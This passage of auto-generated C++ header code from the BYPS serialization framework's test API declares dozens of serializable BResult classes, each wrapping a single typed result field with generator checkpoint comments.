public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1457164460
// typeId=1111888832
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1457164460 : public BSerializable {
public: byps::PSetLong result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1457164460(byps::PSetLong result = byps::PSetLong()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1487265161
// typeId=149769063
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1487265161 : public BSerializable {
public: byps::PMapByteDouble result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1487265161(byps::PMapByteDouble result = byps::PMapByteDouble()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1488550492
// typeId=822552572
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1488550492 : public BSerializable {
public: byps::PMapStringObject result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1488550492(byps::PMapStringObject result = byps::PMapStringObject()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1493282670
// typeId=1955210948
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1493282670 : public BSerializable {
public: byps::PSetInteger result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1493282670(byps::PSetInteger result = byps::PSetInteger()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_15
// typeId=534004416
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_15 : public BSerializable {
public: PContentStream result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_15(PContentStream result = PContentStream()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1504867122
// typeId=1210513700
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1504867122 : public BSerializable {
public: byps::PVectorDate result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1504867122(byps::PVectorDate result = byps::PVectorDate()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1516687588
// typeId=2043070523
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1516687588 : public BSerializable {
public: PArray4Float result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1516687588(PArray4Float result = PArray4Float()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1555345627
// typeId=343940505
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1555345627 : public BSerializable {
public: byps::PVectorDouble result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1555345627(byps::PVectorDouble result = byps::PVectorDouble()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1596367810
// typeId=1073221568
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1596367810 : public BSerializable {
public: byps::test::api::prim::PVectorPrimitiveTypes result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1596367810(byps::test::api::prim::PVectorPrimitiveTypes result = byps::test::api::prim::PVectorPrimitiveTypes()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_16
// typeId=534004415
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_16 : public BSerializable {
public: PRemote result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_16(PRemote result = PRemote()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1617670280
// typeId=1330811042
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1617670280 : public BSerializable {
public: byps::PVectorBoolean result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1617670280(byps::PVectorBoolean result = byps::PVectorBoolean()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1628501332
// typeId=368905437
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1628501332 : public BSerializable {
public: byps::PVectorFloat result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1628501332(byps::PVectorFloat result = byps::PVectorFloat()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1633500852
// typeId=1231328865
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1633500852 : public BSerializable {
public: byps_ptr< ::std::vector< byps_ptr< ::std::map< int32_t , byps_ptr< ::std::vector< byps::PSetInteger > > > > > > result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1633500852(byps_ptr< ::std::vector< byps_ptr< ::std::map< int32_t , byps_ptr< ::std::vector< byps::PSetInteger > > > > > > result = byps_ptr< ::std::vector< byps_ptr< ::std::map< int32_t , byps_ptr< ::std::vector< byps::PSetInteger > > > > > >()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1633750383
// typeId=1293200061
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1633750383 : public BSerializable {
public: byps_ptr< ::std::map< int32_t , PArrayInt > > result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1633750383(byps_ptr< ::std::map< int32_t , PArrayInt > > result = byps_ptr< ::std::map< int32_t , PArrayInt > >()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1661807911
// typeId=475882038
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1661807911 : public BSerializable {
public: byps::PVectorCharacter result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1661807911(byps::PVectorCharacter result = byps::PVectorCharacter()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_17
// typeId=534004414
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_17 : public BSerializable {
public: BDateTime result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_17(BDateTime result = BDateTime()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1710660846
// typeId=1899847531
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1710660846 : public BSerializable {
public: byps::PMapStringString result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1710660846(byps::PMapStringString result = byps::PMapStringString()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_171948703
// typeId=871356108
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_171948703 : public BSerializable {
public: byps::test::api::inl::PActor result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_171948703(byps::test::api::inl::PActor result = byps::test::api::inl::PActor()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1746702954
// typeId=408452669
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1746702954 : public BSerializable {
public: byps_ptr< ::std::vector< byps::PVectorInteger > > result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1746702954(byps_ptr< ::std::vector< byps::PVectorInteger > > result = byps_ptr< ::std::vector< byps::PVectorInteger > >()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1752158699
// typeId=1912328929
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1752158699 : public BSerializable {
public: byps_ptr< ::std::vector< PArrayInt > > result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1752158699(byps_ptr< ::std::vector< PArrayInt > > result = byps_ptr< ::std::vector< PArrayInt > >()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1799280818
// typeId=2052610089
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1799280818 : public BSerializable {
public: byps_ptr< ::std::map< int32_t , PBytes > > result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1799280818(byps_ptr< ::std::map< int32_t , PBytes > > result = byps_ptr< ::std::map< int32_t , PBytes > >()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_181681714
// typeId=1763202727
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_181681714 : public BSerializable {
public: byps::PVectorInteger result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_181681714(byps::PVectorInteger result = byps::PVectorInteger()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1823330785
// typeId=114088296
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1823330785 : public BSerializable {
public: byps_ptr< ::std::vector< byps::test::api::inl::PVectorPoint2D > > result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1823330785(byps_ptr< ::std::vector< byps::test::api::inl::PVectorPoint2D > > result = byps_ptr< ::std::vector< byps::test::api::inl::PVectorPoint2D > >()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1831201218
// typeId=50516327
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1831201218 : public BSerializable {
public: byps::test::api::prim::PMapIntegerPrimitiveTypes result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1831201218(byps::test::api::prim::PMapIntegerPrimitiveTypes result = byps::test::api::prim::PMapIntegerPrimitiveTypes()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_183594037
// typeId=15818284
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_183594037 : public BSerializable {
public: byps::PArrayObject result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_183594037(byps::PArrayObject result = byps::PArrayObject()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_184101377
// typeId=748770738
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_184101377 : public BSerializable {
public: byps::test::api::inl::PArrayPoint2D result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_184101377(byps::test::api::inl::PArrayPoint2D result = byps::test::api::inl::PArrayPoint2D()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1859644668
// typeId=2130431383
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1859644668 : public BSerializable {
public: PArray4Short result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1859644668(PArray4Short result = PArray4Short()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1888107655
// typeId=2063745441
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1888107655 : public BSerializable {
public: PArrayString result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1888107655(PArrayString result = PArrayString()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1888799711
// typeId=2051074845
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1888799711 : public BSerializable {
public: byps::PSetString result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1888799711(byps::PSetString result = byps::PSetString()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1898022288
// typeId=515346332
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1898022288 : public BSerializable {
public: byps::PSetFloat result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1898022288(byps::PSetFloat result = byps::PSetFloat()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_19
// typeId=534004412
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_19 : public BSerializable {
public: bool result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_19(bool result = bool()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1972793385
// typeId=1958357790
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1972793385 : public BSerializable {
public: byps::PMapDoubleByte result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1972793385(byps::PMapDoubleByte result = byps::PMapDoubleByte()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1973996106
// typeId=1391760319
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1973996106 : public BSerializable {
public: byps::PMapShortLong result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1973996106(byps::PMapShortLong result = byps::PMapShortLong()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_1997002548
// typeId=1082818537
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_1997002548 : public BSerializable {
public: byps::PVectorShort result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_1997002548(byps::PVectorShort result = byps::PVectorShort()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_2
// typeId=432867946
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_2 : public BSerializable {
public: int8_t result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_2(int8_t result = int8_t()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_2028443792
// typeId=1664501789
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_2028443792 : public BSerializable {
public: byps::PSetShort result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_2028443792(byps::PSetShort result = byps::PSetShort()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_2052431866
// typeId=1566928477
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_2052431866 : public BSerializable {
public: byps_ptr< ::std::set< PBytes > > result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_2052431866(byps_ptr< ::std::set< PBytes > > result = byps_ptr< ::std::set< PBytes > >()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_2053507648
// typeId=1814499786
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_2053507648 : public BSerializable {
public: byps::test::api::prim::PArrayPrimitiveTypes result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_2053507648(byps::test::api::prim::PArrayPrimitiveTypes result = byps::test::api::prim::PArrayPrimitiveTypes()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_2058423690
// typeId=1698849803
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_2058423690 : public BSerializable {
public: PArrayBoolean result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_2058423690(PArrayBoolean result = PArrayBoolean()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_2064980445
// typeId=937508540
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_2064980445 : public BSerializable {
public: byps::test::api::inl::PVectorPoint2D result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_2064980445(byps::test::api::inl::PVectorPoint2D result = byps::test::api::inl::PVectorPoint2D()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_2067161310
// typeId=925799231
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_2067161310 : public BSerializable {
public: PArrayShort result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_2067161310(PArrayShort result = PArrayShort()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_2087445849
// typeId=1650981375
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_2087445849 : public BSerializable {
public: PArray4Double result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_2087445849(PArray4Double result = PArray4Double()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_21
// typeId=534004389
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_21 : public BSerializable {
public: PSerializable result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_21(PSerializable result = PSerializable()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_2123584667
// typeId=253151806
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_2123584667 : public BSerializable {
public: byps::PVectorString result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_2123584667(byps::PVectorString result = byps::PVectorString()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_3
// typeId=432867945
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_3 : public BSerializable {
public: int16_t result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_3(int16_t result = int16_t()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_31512998
// typeId=1620912700
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_31512998 : public BSerializable {
public: byps::PSetByte result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_31512998(byps::PSetByte result = byps::PSetByte()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_39910537
// typeId=245460547
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_39910537 : public BSerializable {
public: PArray4Int result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_39910537(PArray4Int result = PArray4Int()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_4
// typeId=432867944
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_4 : public BSerializable {
public: wchar_t result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_4(wchar_t result = wchar_t()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_476459792
// typeId=255681041
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_476459792 : public BSerializable {
public: byps::PMapIntegerInputStream result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_476459792(byps::PMapIntegerInputStream result = byps::PMapIntegerInputStream()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_5
// typeId=432867943
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_5 : public BSerializable {
public: int32_t result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_5(int32_t result = int32_t()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_51898890
// typeId=905019472
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_51898890 : public BSerializable {
public: PArray4Date result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_51898890(PArray4Date result = PArray4Date()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_564008001
// typeId=1405156912
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_564008001 : public BSerializable {
public: byps::test::api::ver::PEvolveIF result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_564008001(byps::test::api::ver::PEvolveIF result = byps::test::api::ver::PEvolveIF()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_588723219
// typeId=1537615291
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_588723219 : public BSerializable {
public: PArray4String result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_588723219(PArray4String result = PArray4String()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_6
// typeId=432867942
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_6 : public BSerializable {
public: int64_t result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_6(int64_t result = int64_t()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_601099730
// typeId=856233055
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_601099730 : public BSerializable {
public: byps::PMapLongShort result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_601099730(byps::PMapLongShort result = byps::PMapLongShort()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
// BResult_65775978
// typeId=1872312576
namespace byps { namespace test { namespace api {
using namespace ::byps;
class BResult_65775978 : public BSerializable {
public: byps::test::api::auth::PSessionInfo result;
// checkpoint byps.gen.cpp.GenApiClass:489
public: BResult_65775978(byps::test::api::auth::PSessionInfo result = byps::test::api::auth::PSessionInfo()) : result(result) {}
public: virtual BTYPEID BSerializable_getTypeId();
// checkpoint byps.gen.cpp.GenApiClass:886
public: void serialize(BIO& ar, const BVERSION version);
};
}}}
// checkpoint byps.gen.cpp.GenApiClass:668
//-------------------------------------------------
